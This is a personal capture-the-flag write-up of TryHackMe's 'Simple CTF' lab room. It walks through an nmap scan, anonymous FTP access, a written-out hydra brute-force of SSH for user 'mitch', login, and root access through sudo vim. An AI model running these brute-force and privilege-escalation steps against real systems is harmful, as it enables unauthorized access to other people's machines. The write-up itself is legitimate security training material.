Hello and welcome to the writeup for TryHackMe's room Simple CTF. As the name suggests, this was a super easy room but I still learned a few things. So, let's start.
Enumeration
As always, I start the enumeration with an nmap scan.
βββ(kaliγΏkali)-[~/thm/simplectf]ββ$nmap-sV-sC-Pn10.10.152.20StartingNmap7.94 ( https://nmap.org ) at 2024-01-13 08:22 ESTNmapscanreportfor10.10.232.210Hostisup (0.41s latency).Notshown:997filteredtcpports (no-response)PORTSTATESERVICEVERSION21/tcpclosedftp80/tcpclosedhttp2222/tcpclosedEtherNetIP-1Servicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:1IPaddress (1 hostup) scanned in 32.78 seconds
There are three ports open. Port 21, 80 and 2222. Port 21 is ftp. Although it says closed in the nmap scan, it's possible that this port is vulnerable to ftp anonymous login. We can use anonymous:anonymous credentials to see if it works.
Aha! We are now connected to ftp and we can try to transfer files. Now that I know the credentials, I will use the one-liner wget command to download all available files on ftp server.
We find a ForMitch.txt. Let's see what the file says.
ForMitch.txt
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
Getting User Shell
The file is addressed "For Mitch" and the sender says Mitch has set the same password for the system user. The sender also implies the password can be cracked in seconds. Just a hunch, but I am guessing one of the users on this machine could be Mitch and Mitch is a pretty bad developer (according to the sender). So, Mitch might have set a weak password for the SSH service. Now, THM hint says we can use the best110.txt file to crack the password. We also know the SSH service on this machine is running on Port 2222. Armed with this information, let's try to brute force the password. I will use hydra for cracking the password.
βββ(kaliγΏkali)-[~/thm/simplectf]ββ$ hydra -t 4 -l mitch -P /usr/share/seclists/SecLists-master/Passwords/Common-Credentials/best110.txt ssh://10.10.152.20:2222
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-16 04:20:08[DATA] max 4 tasks per 1 server, overall 4 tasks, 110 login tries (l:1/p:110), ~28 tries per task[DATA] attacking ssh://10.10.152.20:2222/[STATUS] 40.00 tries/min, 40 tries in 00:01h, 70 to do in 00:02h, 4 active[STATUS] 32.00 tries/min, 64 tries in 00:02h, 46 to do in 00:02h, 4 active[STATUS] 28.00 tries/min, 84 tries in 00:03h, 26 to do in 00:01h, 4 active[2222][ssh] host: 10.10.152.20 login: mitch password: *****1of1targetsuccessfullycompleted,1validpasswordfoundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-16 04:23:23
We found the password! Let's try SSH-ing to the machine with the username mitch and the cracked password.
βββ(kaliγΏkali)-[~/thm/simplectf]ββ$ssh-p2222mitch@10.10.152.20Theauthenticityofhost'[10.10.152.20]:2222 ([10.10.152.20]:2222)'can't be established.ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEqOpvTbO8dOJPcHGgmeABEdQ5g.This host key is known by the following other names/addresses: ~/.ssh/known_hosts:27: [hashed name]Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '[10.10.152.20]:2222' (ED25519) to the list of known hosts.mitch@10.10.152.20'spassword:WelcometoUbuntu16.04.6LTS (GNU/Linux 4.15.0-58-generici686)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/advantage0packagescanbeupdated.0updatesaresecurityupdates.Lastlogin:MonAug1918:13:412019from192.168.0.190$whoamimitch$bashmitch@Machine:~$
Privilege Escalation
Now that we have a full shell as user mitch, we can run sudo -l to see if there are any misconfigurations.
So, we can run the vim program without passwords. Vim has a sudo vulnerability which does not drop the superuser privileges and can be used to get root shell.
We have got root shell! And, the machine is pawned. I learned about privilege escalation with Vim and password cracking for SSH running on Port 2222 so this was a fun room. Thank you for reading, I will see you in the next writeup.